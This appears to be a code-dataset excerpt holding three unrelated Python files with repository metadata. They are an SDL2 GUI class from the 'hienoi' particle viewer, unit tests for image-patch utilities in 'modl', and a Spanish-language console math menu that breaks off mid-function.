grid_color : hienoi.Vector4f
Color for the grid.
grid_origin_color : hienoi.Vector4f
Color for the origin axis of the grid.
particle_display : int
Display mode for the particles. Available values are enumerated in the
:class:`~hienoi.ParticleDisplay` class.
point_size : int
Size of the particles in pixels when the display mode is set to
:attr:`~hienoi.ParticleDisplay.POINT`.
edge_feather : float
Feather fall-off in pixels to apply to objects drawn with displays such
as :attr:`~hienoi.ParticleDisplay.CIRCLE` or
:attr:`~hienoi.ParticleDisplay.DISC`.
stroke_width : float
Width of the stroke in pixels to apply to objects drawn with displays
such as :attr:`~hienoi.ParticleDisplay.CIRCLE`.
quit : bool
``True`` to signal to the application that it should quit.
has_view_changed : bool
``True`` if the view state has just been changed following an event. It
is reset to ``False`` whenever :meth:`poll_events` is called.
user_data : object
Attribute reserved for any user data.
"""
def __init__(self,
window_title='hienoi',
window_position=Vector2i(sdl2.SDL_WINDOWPOS_CENTERED,
sdl2.SDL_WINDOWPOS_CENTERED),
window_size=Vector2i(800, 600),
window_flags=sdl2.SDL_WINDOW_RESIZABLE,
view_aperture_x=100.0,
view_zoom_range=Vector2f(1e-6, 1e+6),
mouse_wheel_step=0.01,
grid_density=10.0,
grid_adaptive_threshold=3.0,
show_grid=True,
background_color=Vector4f(0.15, 0.15, 0.15, 1.0),
grid_color=Vector4f(0.85, 0.85, 0.85, 0.05),
grid_origin_color=Vector4f(0.85, 0.25, 0.25, 0.25),
particle_display=ParticleDisplay.DISC,
point_size=4,
edge_feather=2.0,
stroke_width=0.0,
initialize_callback=None,
on_event_callback=None,
renderer=None):
renderer = {} if renderer is None else renderer
if sdl2.SDL_Init(sdl2.SDL_INIT_VIDEO) != 0:
raise RuntimeError(sdl2.SDL_GetError().decode())
renderer_info = hienoi.renderer.get_info()
if renderer_info.api == GraphicsAPI.OPENGL:
sdl2.SDL_GL_SetAttribute(sdl2.SDL_GL_CONTEXT_MAJOR_VERSION,
renderer_info.major_version)
sdl2.SDL_GL_SetAttribute(sdl2.SDL_GL_CONTEXT_MINOR_VERSION,
renderer_info.minor_version)
if renderer_info.profile == GLProfile.CORE:
sdl2.SDL_GL_SetAttribute(sdl2.SDL_GL_CONTEXT_PROFILE_MASK,
sdl2.SDL_GL_CONTEXT_PROFILE_CORE)
self._handles = _create_handles(window_title, window_position,
window_size, window_flags,
renderer_info)
self._renderer = hienoi.renderer.Renderer(**renderer)
self._initial_view_aperture_x = view_aperture_x
self._view_zoom_range = view_zoom_range
self._mouse_wheel_step = mouse_wheel_step
self._grid_adaptive_threshold = grid_adaptive_threshold
self._on_event_callback = on_event_callback
self._listen_for_navigation = False
self._is_view_manipulated = False
self.view_position = Vector2f(0.0, 0.0)
self._view_zoom = 1.0
self.grid_density = grid_density
self.show_grid = show_grid
self.background_color = background_color
self.grid_color = grid_color
self.grid_origin_color = grid_origin_color
self.particle_display = particle_display
self.point_size = point_size
self.edge_feather = edge_feather
self.stroke_width = stroke_width
self._navigation_action = NavigationAction.NONE
self.quit = False
self.user_data = UserData()
if initialize_callback:
initialize_callback(self)
@property
def view_zoom(self):
return self._view_zoom
@view_zoom.setter
def view_zoom(self, value):
self._view_zoom = max(self._view_zoom_range[0],
min(self._view_zoom_range[1], value))
@property
def navigation_action(self):
return self._navigation_action
@property
def has_view_changed(self):
return self._has_view_changed
def poll_events(self, scene_state, data=None):
"""Process each event in the queue.
Parameters
----------
scene_state : hienoi.renderer.SceneState
Scene state.
data : object
Data to pass back and forth between the caller and the function set
for the 'on event' callback.
"""
self._has_view_changed = False
event = sdl2.SDL_Event()
while sdl2.SDL_PollEvent(ctypes.byref(event)) != 0:
event_type = event.type
if event_type == sdl2.SDL_QUIT:
self._on_quit_event(event.quit)
elif event_type == sdl2.SDL_WINDOWEVENT:
self._on_window_event(event.window)
elif event_type == sdl2.SDL_KEYDOWN:
self._on_key_down_event(event.key, scene_state)
elif event_type == sdl2.SDL_KEYUP:
self._on_key_up_event(event.key)
elif event_type == sdl2.SDL_MOUSEBUTTONDOWN:
self._on_mouse_button_down_event(event.button)
elif event_type == sdl2.SDL_MOUSEBUTTONUP:
self._on_mouse_button_up_event(event.button)
elif event_type == sdl2.SDL_MOUSEWHEEL:
self._on_mouse_wheel_event(event.wheel)
elif event_type == sdl2.SDL_MOUSEMOTION:
self._on_mouse_motion_event(event.motion)
if self._on_event_callback:
self._on_event_callback(self, data, event)
if self.quit:
break
def render(self, scene_state):
"""Render a new frame.
Parameters
----------
scene_state : hienoi.renderer.SceneState
Scene state.
"""
renderer_state = hienoi.renderer.State(
window_size=self.get_window_size(),
view_position=self.view_position,
view_zoom=self._view_zoom,
origin=self.world_to_screen(Vector2f(0.0, 0.0)),
initial_view_aperture_x=self._initial_view_aperture_x,
view_aperture=self.get_view_aperture(),
grid_density=self.grid_density,
grid_adaptive_threshold=self._grid_adaptive_threshold,
background_color=self.background_color,
grid_color=self.grid_color,
grid_origin_color=self.grid_origin_color,
show_grid=self.show_grid,
particle_display=self.particle_display,
point_size=self.point_size,
edge_feather=self.edge_feather,
stroke_width=self.stroke_width,
)
self._renderer.render(renderer_state, scene_state)
if hienoi.renderer.get_info().api == GraphicsAPI.OPENGL:
sdl2.SDL_GL_SwapWindow(self._handles.window)
def terminate(self):
"""Cleanup the GUI resources."""
self._renderer.cleanup()
if hienoi.renderer.get_info().api == GraphicsAPI.OPENGL:
sdl2.SDL_GL_DeleteContext(self._handles.renderer.context)
sdl2.SDL_DestroyWindow(self._handles.window)
sdl2.SDL_Quit()
def get_window_size(self):
"""Retrieve the window size.
Returns
-------
hienoi.Vector2i
The window size.
"""
window_size_x = ctypes.c_int()
window_size_y = ctypes.c_int()
sdl2.SDL_GetWindowSize(self._handles.window,
ctypes.byref(window_size_x),
ctypes.byref(window_size_y))
return Vector2i(window_size_x.value, window_size_y.value)
def get_view_aperture(self):
"""Retrieve the view aperture.
It represents the area in world units covered by the view.
Returns
-------
hienoi.Vector2f
The view aperture.
"""
window_size = self.get_window_size()
aperture_x = self._initial_view_aperture_x / self._view_zoom
return Vector2f(aperture_x, aperture_x * window_size.y / window_size.x)
def get_mouse_position(self):
"""Retrieve the mouse position in screen space.
Returns
-------
hienoi.Vector2i
The mouse position.
"""
position_x = ctypes.c_int()
position_y = ctypes.c_int()
sdl2.SDL_GetMouseState(ctypes.byref(position_x),
ctypes.byref(position_y))
return Vector2i(position_x.value, position_y.value)
def get_screen_to_world_ratio(self):
"""Retrieve the ratio to convert a sreen unit into a world unit.
Returns
-------
float
The screen to world ratio.
"""
window_size = self.get_window_size()
aperture_x = self._initial_view_aperture_x / self._view_zoom
return aperture_x / window_size.x
def screen_to_world(self, point):
"""Convert a point from screen space to world space coordinates.
Parameters
----------
point : hienoi.Vector2i
Point in screen space coordinates.
Returns
-------
hienoi.Vector2f
The point in world space coordinates.
"""
window_size = self.get_window_size()
view_aperture = self.get_view_aperture()
return Vector2f(
(self.view_position.x
+ (point.x - window_size.x / 2.0)
* view_aperture.x / window_size.x),
(self.view_position.y
- (point.y - window_size.y / 2.0)
* view_aperture.y / window_size.y))
def world_to_screen(self, point):
"""Convert a point from world space to screen space coordinates.
Parameters
----------
point : hienoi.Vector2f
Point in world space coordinates.
Returns
-------
hienoi.Vector2i
The point in screen space coordinates.
"""
window_size = self.get_window_size()
view_aperture = self.get_view_aperture()
return Vector2i(
int(round(
(window_size.x / view_aperture.x)
* (-self.view_position.x + point.x + view_aperture.x / 2.0))),
int(round(
(window_size.y / view_aperture.y)
* (self.view_position.y - point.y + view_aperture.y / 2.0))))
def write_snapshot(self, filename):
"""Take a snapshot of the view and write it as a BMP image.
Parameters
----------
filename : str
Destination filename.
"""
pixel_size = 4
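        # 4 bytes per pixel: the three RGB masks plus one unused byte
        # (the alpha mask passed to SDL below is left at 0)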
pixels = self._renderer.read_pixels()
surface = sdl2.SDL_CreateRGBSurfaceFrom(
pixels.data, pixels.width, pixels.height,
8 * pixel_size, pixels.width * pixel_size,
_RGB_MASKS.red, _RGB_MASKS.green, _RGB_MASKS.blue, 0)
sdl2.SDL_SaveBMP(surface, filename)
sdl2.SDL_FreeSurface(surface)
def _reset_view(self):
"""Reset the view position and zoom."""
self.view_position = Vector2f(0.0, 0.0)
self.view_zoom = 1.0
self._has_view_changed = True
def _fit_view(self, scene_state):
"""Fit the view to the scene."""
if len(scene_state.particles) > 1:
window_size = self.get_window_size()
initial_size = Vector2f(
self._initial_view_aperture_x,
self._initial_view_aperture_x * window_size.y / window_size.x)
lower_bounds = scene_state.lower_bounds
upper_bounds = scene_state.upper_bounds
required_size = (upper_bounds - lower_bounds).iscale(
_FIT_VIEW_REL_PADDING)
required_size = Vector2f(
max(required_size.x,
initial_size.x * self._view_zoom_range[0]),
max(required_size.y,
initial_size.y * self._view_zoom_range[0]))
self.view_position = (lower_bounds + upper_bounds).iscale(0.5)
self.view_zoom = min(initial_size.x / required_size.x,
initial_size.y / required_size.y)
elif len(scene_state.particles) == 1:
self.view_position = Vector2f(
*scene_state.particles['position'][0])
self.view_zoom = 1.0
else:
self._reset_view()
self._has_view_changed = True
def _on_quit_event(self, event):
"""Event 'on quit'."""
self.quit = True
def _on_window_event(self, event):
"""Event 'on window'."""
if event.event == sdl2.SDL_WINDOWEVENT_SIZE_CHANGED:
self._renderer.resize(event.data1, event.data2)
def _on_key_down_event(self, event, scene_state):
"""Event 'on key down'."""
code = event.keysym.sym
modifier = event.keysym.mod
if modifier == sdl2.KMOD_NONE:
if code == sdl2.SDLK_SPACE:
self._listen_for_navigation = True
elif code == sdl2.SDLK_d:
self.particle_display = (
(self.particle_display + 1) % (ParticleDisplay._LAST + 1))
elif code == sdl2.SDLK_f:
self._fit_view(scene_state)
elif code == sdl2.SDLK_g:
self.show_grid = not self.show_grid
elif code == sdl2.SDLK_r:
self._reset_view()
def _on_key_up_event(self, event):
"""Event 'on key up'."""
code = event.keysym.sym
if code == sdl2.SDLK_SPACE:
self._listen_for_navigation = False
def _on_mouse_button_down_event(self, event):
"""Event 'on mouse button down'."""
if self._listen_for_navigation:
if event.button == sdl2.SDL_BUTTON_LEFT:
self._navigation_action = NavigationAction.MOVE
elif event.button == sdl2.SDL_BUTTON_RIGHT:
self._navigation_action = NavigationAction.ZOOM
def _on_mouse_button_up_event(self, event):
"""Event 'on mouse button up'."""
if (event.button == sdl2.SDL_BUTTON_LEFT
or event.button == sdl2.SDL_BUTTON_RIGHT):
self._navigation_action = NavigationAction.NONE
def _on_mouse_wheel_event(self, event):
"""Event 'on mouse wheel'."""
scale = 1.0 + self._mouse_wheel_step * event.y
self.view_zoom *= scale
self._has_view_changed = True
def _on_mouse_motion_event(self, event):
"""Event 'on mouse motion'."""
window_size = self.get_window_size()
view_aperture = self.get_view_aperture()
if self._navigation_action == NavigationAction.MOVE:
self.view_position.set(
(self.view_position.x
- event.xrel * view_aperture.x / window_size.x),
(self.view_position.y
+ event.yrel * view_aperture.y / window_size.y))
self._has_view_changed = True
elif self._navigation_action == NavigationAction.ZOOM:
scale = (1.0
+ float(event.xrel) / window_size.x
- float(event.yrel) / window_size.y)
self.view_zoom *= scale
self._has_view_changed = True
def _create_handles(window_title, window_position, window_size, window_flags,
renderer_info):
"""Create the SDL2 handles."""
window_flags = sdl2.SDL_WINDOW_SHOWN | window_flags
if renderer_info.api == GraphicsAPI.OPENGL:
window_flags |= sdl2.SDL_WINDOW_OPENGL
window = sdl2.SDL_CreateWindow(
window_title.encode(),
window_position.x, window_position.y,
window_size.x, window_size.y,
window_flags)
if not window:
raise RuntimeError(sdl2.SDL_GetError().decode())
context = sdl2.SDL_GL_CreateContext(window)
if not context:
raise RuntimeError(sdl2.SDL_GetError().decode())
# Try to disable the vertical synchronization. It applies to the active
# context and thus needs to be called after `SDL_GL_CreateContext`.
sdl2.SDL_GL_SetSwapInterval(0)
return _Handles(
window=window,
renderer=_GLHandles(context=context))
|
mit
| 9,104,025,055,639,628,000
| 34.851064
| 79
| 0.574233
| false
| 3.823752
| false
| false
| false
|
arthurmensch/modl
|
modl/input_data/tests/test_image.py
|
1
|
1754
|
import numpy as np
from modl.input_data.image import scale_patches
from modl.input_data.image_fast import clean_mask, fill
from numpy.testing import assert_array_almost_equal, assert_array_equal
from sklearn.feature_extraction.image import extract_patches
from sklearn.utils import check_random_state
def test_scale_patches():
patch_size = (8, 8, 3)
n = 100
shape = (n, ) + patch_size
rs = check_random_state(0)
X = rs.randn(*shape)
Y = scale_patches(X, with_mean=True, with_std=True, channel_wise=True)
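    # with channel_wise scaling each of the 3 channels is normalized
    # separately, so every channel carries 1/3 of the unit patch energy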
assert_array_almost_equal(Y.mean(axis=(1, 2)), 0)
assert_array_almost_equal(np.sum(Y ** 2, axis=(1, 2)), 1 / 3)
scale_patches(X, with_mean=True, with_std=True, channel_wise=True,
copy=False)
assert_array_equal(X, Y)
X = rs.randn(*shape)
Y = scale_patches(X, with_mean=False, with_std=True, channel_wise=True)
assert_array_almost_equal(np.sum(Y ** 2, axis=(1, 2)), 1 / 3)
Y = scale_patches(X, with_mean=True, with_std=False, channel_wise=True)
assert_array_almost_equal(Y.mean(axis=(1, 2)), 0)
Y = scale_patches(X, with_mean=True, with_std=True, channel_wise=False)
assert_array_almost_equal(Y.mean(axis=(1, 2, 3)), 0)
assert_array_almost_equal(np.sum(Y ** 2, axis=(1, 2, 3)), 1)
def test_clean():
A = np.ones((64, 64, 3))
A[:2, :, :] = -1
A[-2:, :, :] = -1
A[:, :2, :] = -1
A[:, -2:, :] = -1
patches = extract_patches(A, (8, 8, 3))
idx = clean_mask(patches, A)
mask = np.zeros((64, 64, 3))
mask[2:55, 2:55, 0] = 1
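    # valid top-left patch corners: rows/cols 2 .. 64 - 8 - 2 = 54 (slice
    # 2:55), i.e. positions whose 8x8 patch avoids the border of -1 values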
true_idx = np.c_[np.where(mask)]
assert_array_almost_equal(idx, true_idx)
def test_fill():
p, q, r = 10, 10, 10
assert_array_equal(np.c_[np.where(np.ones((p, q, r)))], fill(p, q, r))
|
bsd-2-clause
| -5,648,527,415,653,365,000
| 32.730769
| 75
| 0.611745
| false
| 2.749216
| false
| false
| false
|
charre2017idv/MathDinamita
|
Math_Lib/Math_Lib/Math_Lib.py
|
1
|
28504
|
import math
import os
n=0
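# n holds the menu option chosen by the user below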
print ("MATHLIB (TM)2017")
print ("-"*50)
print ("Las funciones que puede realizar la libreria son las siguientes:")
print ("")
'''Here the main menu is built'''
print ("FUNCIONES BASICAS:")
print ("")
print ("-(1) Suma ")
print ("-(2) Multiplicacion ")
print ("-(3) Division")
print ("-(4) Modulo")
print ("-(5) Potencia")
print ("-(6) Raiz")
print ("-(7) Verificacion de numeros primos")
print ("-(8) Rango de numeros primos")
print ("")
print ("FUNCIONES DE CONVERSION:")
print ("")
print ("-(9) Binario -> Hexadecimal")
print ("-(10) Binario -> Decimal")
print ("-(11) Decimal -> Hexadecimal")
print ("-(12) Decimal -> Binario")
print ("-(13) Hexadecimal -> Binario")
print ("-(14) Hexadecimal -> Decimal")
print ("-(15) Metros -> Yardas")
print ("-(16) Yardas -> Metros")
print ("-(17) Metros -> Pulgadas")
print ("-(18) Pulgadas -> Metros")
print ("")
print ("FUNCIONES ADICIONALES: ")
print ("")
print ("-(19) Indice de Masa Corporal [IMC]")
print ("")
print ("-"*50)
'''From here on we set up what happens depending on
the number the user types in'''
while (n<1 or n>19):
n=int(input("Escriba el numero de la funcion a realizar: "))
if (n<1 or n>19):
print ("Ese numero es invalido. Por favor, ingrese una opcion permitida")
print ("")
print ("-"*50)
os.system("cls")
"""Aqui definimos algunas de las funciones que vamos a ocupar en el repositorio"""
def suma (a):
return a
def multiplicacion (a):
return a
def division (a,b):
return float(a/b)
def modulo (a,b):
return a%b
def potencia (a,b): #TODO: accept decimal exponents from the menu
    return float(a**b)
def raiz (a,b):
    # a is the index, b the radicand: compute the a-th root of b
    return b ** (1.0 / a)
def BaH (a):
return a
def DaH (a):
return a
def DaB (a):
return a
def HaB (a): # The code that runs this is in option 13
    if (a == "0"): # first hexadecimal value to convert
        cambio = "0000" # its binary equivalent
    elif ( a == "1"): # second hexadecimal value to convert
        cambio = "0001" # its binary equivalent
elif (a == "2"):
cambio = "0010"
elif (a == "3"):
cambio = "0011"
elif (a == "4"):
cambio = "0100"
elif (a == "5"):
cambio = "0101"
elif (a == "6"):
cambio = "0110"
elif (a == "7"):
cambio = "0111"
elif (a == "8"):
cambio = "1000"
elif (a == "9"):
cambio = "1001"
elif (a == "A" or a == "a"):
cambio = "1010"
elif (a == "B" or a == "b"):
cambio = "1011"
elif (a == "C" or a == "c"):
cambio = "1100"
elif (a == "D" or a == "d"):
cambio = "1101"
elif (a == "E" or a == "e"):
cambio = "1110"
elif (a == "F" or a == "f"):
cambio = "1111"
    else:
        cambio = "Ese valor no es valido."
    return cambio
def HaD (a):
return a
def BaD (a):
return a
def primos (a,b):
return (a,b)
def primosrang (a,b):
return (a,b)
# ADDITION
# This function adds together the numbers the user provides and prints
# the new numeric value.
if (n==1): #Addition
print ("---SUMA---")
hlp=str(input("Para iniciar la funcion presione 'Enter', pero si no sabe como funciona o necesita ayuda, presione 'h': "))
print ("")
if (hlp=="h" or hlp=="H"):
print ("---Ayuda de Suma---")
print ("(1) Ingresar la cantidad de numeros a sumar")
print ("(2) Ingresar las cifras individualmente y presionar 'Enter' para registrarlas")
print ("(3) Una vez ingresados todos los datos su respuesta se imprimira presionando 'Enter'")
print ("")
    #Ask the user how many numbers will be added
    a=(input("Escriba cantidad de numeros a sumar: "))
    #Keep asking so the program does not crash on bad input
    while (not a.isdigit()):
        print("Porfavor no deje en espacio vacio ")
        a=(input("Escriba cantidad de numeros a sumar: "))
    a=int(a)
    i=0
    r=0
    while(i<a):
        #Read each number to be added
        b=int(input("Numero: "))
        #Accumulate the running total
        r=r+b
        i=i+1
    #Print the result
    print ("El resultado de la suma es: " +str(suma(r)))
    print ("")
print ("")
"""MULTIPLICACION
En esta funcion se pueden multiplicar dos variables dadas por el usuario y asi obtener un nuevo valor numerico """
elif (n==2): #Multiplicacion
print ("---MULTIPLICACION---")
print ("")
hlp=str(input("Para iniciar la funcion presione 'Enter', pero si no sabe como funciona o necesita ayuda, presione 'h': "))
print ("")
if (hlp=="h" or hlp=="H"):
print ("---Ayuda de Multiplicacion---")
print ("(1) Ingresar la cantidad de numeros a multiplicar")
print ("(2) Ingresar las cifras individualmente y presionar 'Enter' para registrarlas")
print ("(3) Una vez ingresados todos los datos su respuesta se imprimira presionando 'Enter'")
print ("")
    #Ask how many numbers will be multiplied
    a=(input("Escriba cantidad de numeros a multiplicar: "))
    i=0
    r=1
    while(not a.isdigit()):
        print("Porfavor no deje el espacio vacio")
        a=(input("Escriba cantidad de numeros a multiplicar: "))
    a=int(a)
    while(i<a):
        #Read each factor
        b=int(input("Numero: "))
        #Accumulate the product
        r=r*b
        i=i+1
    #Print the result
    print ("El resultado de la multiplicacion es: " +str(multiplicacion(r)))
"""DIVISION
En esta funcion se va a poder dividir dos valores para asi poder obtener un resultado numerico nuevo
Se utiliza la funcion de numero flotante para que de decimales"""
elif (n==3): #Division
print ("---DIVISION---")
print ("")
hlp=str(input("Para iniciar la funcion presione 'Enter', pero si no sabe como funciona o necesita ayuda, presione 'h': "))
print ("")
if (hlp=="h" or hlp=="H"):
print ("---Ayuda de Division---")
print ("* El programa solo imprime el resultado de la division")
print ("(1) Ingresar el dividendo [El numero a dividir]")
print ("(2) Ingresar el divisor [El numero que dividirá al dividendo]")
print ("(3) Una vez ingresados todos los datos su respuesta se imprimira presionando 'Enter'")
print ("")
    #Ask for the number to be divided
    a=(input("Escriba el dividendo: "))
    while (not a.isdigit()):
        #If the input is invalid, ask again
        print ("Solo se aceptan numeros.")
        print ("")
        a=(input("Escriba el dividendo: "))
    a=float(a)
    #Ask for the number that will divide it
    b=(input("Escriba el divisor: "))
    while (not b.isdigit() or float(b)==0):
        #Reject non-numbers and zero, which cannot be a divisor
        print ("Solo se aceptan numeros.")
        print ("")
        b=(input("Escriba el divisor: "))
    b=float(b)
    #Print the result
    print ("Su resultado es: " +str(division(a,b)))
"""Aqui implementamos la funcion modulo que es una division que solo nos muestra resultados de enteros """
elif (n==4): #Modulo
print ("---MODULO---")
print ("")
hlp=str(input("Para iniciar la funcion presione 'Enter', pero si no sabe como funciona o necesita ayuda, presione 'h': "))
print ("")
if (hlp=="h" or hlp=="H"):
print ("---Ayuda de Modulo---")
print ("* El programa solo imprime el residuo de la division")
print ("(1) Ingresar el dividendo [El numero a dividir]")
print ("(2) Ingresar el divisor [El numero que dividirá al dividendo]")
print ("(3) Una vez ingresados todos los datos su respuesta se imprimira presionando 'Enter'")
print ("")
    #Ask for the dividend and the divisor
    a=(input("Escriba el dividendo : "))
    while (not a.isdigit()):
        #If the input is invalid, ask again
        print ("Solo se aceptan numeros.")
        print ("")
        a=(input("Escriba el dividendo: "))
    a=int(a)
    b=(input("Escriba el divisor: "))
    while (not b.isdigit() or int(b)==0):
        #Reject non-numbers and zero, which cannot be a divisor
        print ("Solo se aceptan numeros.")
        print ("")
        b=(input("Escriba el divisor: "))
    b=int(b)
    #Print the remainder
    print ("Su resultado es: " +str(modulo(a,b)))
"""POTENCIA
La función calculara un numero elevado a cierta potencia.
El usuario puede ingresar el numero base y el exponente que guste para hacer la funcion"""
elif (n==5): #Potencia
print ("---POTENCIA---")
print ("")
hlp=str(input("Para iniciar la funcion presione 'Enter', pero si no sabe como funciona o necesita ayuda, presione 'h': "))
print ("")
if (hlp=="h" or hlp=="H"):
print ("---Ayuda de Potencia---")
print ("(1) Ingresar el numero base [El numero a potenciar]")
print ("(2) Ingresar el exponente [El numero de veces que la base se multiplicara a si misma]")
print ("(3) Una vez ingresados todos los datos su respuesta se imprimira presionando 'Enter'")
print ("")
    #Ask the user for the number to be raised to a power
    a=float(input("Escriba el numero base: "))
    #Ask the user for the exponent
    b=float(input("Escriba el exponente: "))
    #Print the result
    print ("Su resultado es: " +str(potencia(a,b)))
"""RAIZ
La función calculara la raiz de un numero cualquiera ingresado por el usuario.
El usuario puede poner como parametro el indice y numero que gusten"""
elif (n==6): #Raiz
print ("---RAIZ---")
print ("")
hlp=str(input("Para iniciar la funcion presione 'Enter', pero si no sabe como funciona o necesita ayuda, presione 'h': "))
print ("")
if (hlp=="h" or hlp=="H"):
print ("---Ayuda de Raiz---")
print ("(1) Ingresar el radicando [El numero del cual se obtendrá la raiz]")
print ("(2) Ingresar el indice [La raiz de la cual se obtendrá el resultado]")
print ("(3) Una vez ingresados todos los datos su respuesta se imprimira presionando 'Enter'")
print ("")
    # a defaults to 2, the index of a square root
    a=2
    #Ask the user for the data
    #From here on a can change if the user wants a different index
    b=int(input("Escriba numero del radicando: "))
    a=int(input("Escriba a que numero de indice: "))
    if (a<2):
        print ("Si el valor es menor que 2, el indice se toma al cuadrado por defecto")
        a=2
    #Print the result
    print ("Su resultado es: " +str(raiz(a,b)))
"""VERIFICACION DE NUMEROS PRIMOS
La función demostrara si el numero que ha ingresado el usuario es numero primo o no.
El programa verificara si el numero ingresado el multiplo de sus anteriores.
Caso 1: En caso de que encuentre un multiplo, la función imprimira que no es primo
Caso 2: Si el numero demuestra que no es multiplo de nunguno, la función imprimira que si es primo"""
elif (n==7): #Verificacion de numeros primos
print ("---VERIFICACION DE NUMEROS PRIMOS---")
hlp=str(input("Para iniciar la funcion presione 'Enter', pero si no sabe como funciona o necesita ayuda, presione 'h': "))
print ("")
if (hlp=="h" or hlp=="H"):
print ("---Ayuda de Numeros Primos por Verificacion---")
print ("(1) Ingrese una cifra o numero entero cualquiera")
print ("(2) Una vez ingresado el numero el programa evaluara el numero")
print ("(3) Como resultado, el programa le dira si su numero es primo o no")
print ("")
    #a counts the divisors of n
    a=0
    #Ask for the number to check
    n=int(input("Ingrese numero para verificar si es primo: "))
    #Count how many numbers in 1..n divide n evenly
    for i in range(1,n+1):
        #If the remainder is 0, i divides n; add 1 to the counter
        if(n % i==0):
            a=a+1
    #A prime has exactly two divisors: 1 and itself
    if(a!=2):
        print ("El numero "+(str(n)+" no es primo"))
        print ("")
    else:
        print ("El numero "+(str(n)+" si es primo"))
        print ("")
"""NUMERO PRIMO POR RANGO
La función demostrara la lista de numeros primos, tomando como limite el numero ingresado por el usuario
El programa verificara si cada numero dentro del rango es multiplo de sus anteriores.
Caso 1: En caso de que encuentre un multiplo, el numero sera desechado por la funcion.
Caso 2: Si el numero demuestra que no es multiplo de nunguno, sera imprimido en pantalla"""
elif (n==8): #Numero Primo por Rango
#a es un contador
a=0
print ("---NUMEROS PRIMOS POR RANGO---")
hlp=str(input("Para iniciar la funcion presione 'Enter', pero si no sabe como funciona o necesita ayuda, presione 'h': "))
print ("")
if (hlp=="h" or hlp=="H"):
print ("---Ayuda de Numeros Primos por Rango---")
print ("(1) Ingresar una cifra para ponerlo como limite de la lista")
print ("(2) Una vez ingresado el numero el programa evaluara los numeros primos dentro del rango")
print ("(3) Como resultado, se generara una lista de numeros primos hasta el numero limite")
print ("")
    #Ask for the upper limit of the list
    lim=(input("Ingrese el limite de la lista de numeros primos: "))
    while (not lim.isdigit()):
        print ("Solo se aceptan numeros.")
        print ("")
        lim=(input("Ingrese el limite de la lista de numeros primos: "))
    lim=int(lim)
print ("")
print ("La lista de numeros primos hasta el numero "+str(lim)+" es:")
print ("")
    #Start the inspection
    #The range runs from 2 up to the chosen limit
    for x in range (2,lim):
        prnt=False
        verf=0
        for i in range(1,x+1):
            if(x % i==0):
                verf=verf+1
        #A prime ends up with exactly two divisors (verf == 2)
        if (prnt==False and verf<3):
            #Print the primes found
            print (str(x))
            prnt=True
print ("")
# BINARY TO HEXADECIMAL
# This function converts a number written in binary into hexadecimal,
# relying on standard helpers such as hex().
# int(x, 2) parses the string as a base-2 integer, so the validation
# below simply attempts that parse and asks again on failure.
elif (n==9): #Binary to Hexadecimal
print ("---BINARIO -> HEXADECIMAL---")
hlp=str(input("Para iniciar la funcion presione 'Enter', pero si no sabe como funciona o necesita ayuda, presione 'h': "))
print ("")
if (hlp=="h" or hlp=="H"):
print ("---Ayuda de Binario -> Hexadecimal---")
print ("(1) Ingresar una cifra en binario. [Recuerde que este sistema usa 1 y 0] y despues presione 'Enter'")
print ("(2) El programa convertirá la cifra a hexadecimal.")
print ("(3) Como resultado, se imprimira en pantalla la cifra convertida a sistema hexadecimal.")
print ("")
print ("-"*50)
numbinario = input("Ingrese un numero binario: ")
print ("-"*50)
while(not numbinario.isdigit()):
print ("Solo se aceptan numeros en binario.")
numbinario = input("Ingrese un numero binario: ")
print ("-"*50)
bina = int(numbinario, 2)
print ("Su numero",numbinario," en hexadecimal es:", hex(bina))
elif (n==10): #Binary to Decimal -- still incomplete
print ("BINARIO -> DECIMAL")
hlp=str(input("Para iniciar la funcion presione 'Enter', pero si no sabe como funciona o necesita ayuda, presione 'h': "))
print ("")
if (hlp=="h" or hlp=="H"):
print ("---Ayuda de Binario a Decimal---")
print ("(1) Ingresar un numero en binario (Recuerde que estos solo llevan 0 y 1) y luego presionar 'Enter'")
print ("(2) Al recibir su numero en forma decimal aparecera una pregunta")
print ("(3) Presione '1' seguido de un 'Enter' para poder introducir otro numero o presione '0' seguido de un 'Enter' para terminar el programa")
print ("")
respuesta=1
while(respuesta==1):
        #First ask the user for a number in binary
        binario=input("Introduzca un numero en binario: ")
        try:
            # int(x, 2) parses the string in base 2 and raises ValueError
            # on anything that is not made of 0s and 1s
            decimal=int(binario, 2)
            print ("\nSu numero en decimal es: " + str(decimal))
        #If the input was not a valid binary number, report it
        except ValueError:
            print ("Los NUMEROS binarios solo llevan 0 y 1")
respuesta=int(input("Va a introducir otro numero:<Si[1] No[0]>"))
# The DaH flow starts by asking the user for an integer; a value that is
# not a number is reported as an error. .isdigit() checks that the input
# is made only of digits, so letters are rejected.
# Here we implement decimal to hexadecimal, which turns decimal numbers
# into hexadecimal notation
elif (n==11): #Decimal to Hexadecimal
print ("DECIMAL -> HEXADECIMAL")
print ("")
hlp=str(input("Para iniciar la funcion presione 'Enter', pero si no sabe como funciona o necesita ayuda, presione 'h': "))
print ("")
if (hlp=="h" or hlp=="H"):
print ("---Ayuda de Decimal -> Hexadecimal---")
print ("(1) Ingresar una cifra para converir el numero a hexadecimal")
print ("(2) Una vez ingresado el numero, se trasladara a decimal pero contando A, B, C, D, E y F como numeros también.")
print ("(3) Como resultado, el programa le dira el numero que ingreso, pero usando los dieciseis numeros")
print ("")
    #Ask for a number
    a=(input("Ingrese una cifra en decimal: "))
    while (not a.isdigit()):
        #If the input is not a number, tell the user and ask again
        print ("Solo se aceptan numeros.")
        a=(input("Ingrese una cifra en decimal: "))
    #Convert the input to an integer
    a=int(a)
    #Print the result; format(a, '02x') renders it as lowercase hex
    print ("Su resultado es: " + format(a, '02x'))
    print ("")
"""Aqui hacemos la funcion decimal a binario que se encarga de recibir numeros decimales i tranformarlos a codigo binario"""
elif (n==12): #Decimal a Binario
print ("---DECIMAL -> BINARIO---")
print ("")
hlp=str(input("Para iniciar la funcion presione 'Enter', pero si no sabe como funciona o necesita ayuda, presione 'h': "))
print ("")
if (hlp=="h" or hlp=="H"):
print ("---Ayuda de Decimal -> Binario---")
print ("(1) Ingresar una cifra para converir el numero en binario")
print ("(2) Una vez ingresado el numero, se trasladara a 1s y 0s")
print ("(3) Como resultado, el programa le dira el numero que ingreso, pero en binario")
print ("")
respuesta=1
while(respuesta==1):
numero=input("Ingrese un numero: ")
r=[]
        #Letters and decimal fractions cannot be converted to binary,
        #so the parse is wrapped in try/except
        try:
            numero = int(numero)
            if(numero==0):
                print("0 no se puede convertir a binario")
                input()
            elif(numero<0):
                print("Los numeros menores a 0 no se pueden convertir a binario")
                input()
            elif(numero>0):
                while(numero>0):
                    #If the remainder of dividing by 2 is 0, append 0 to
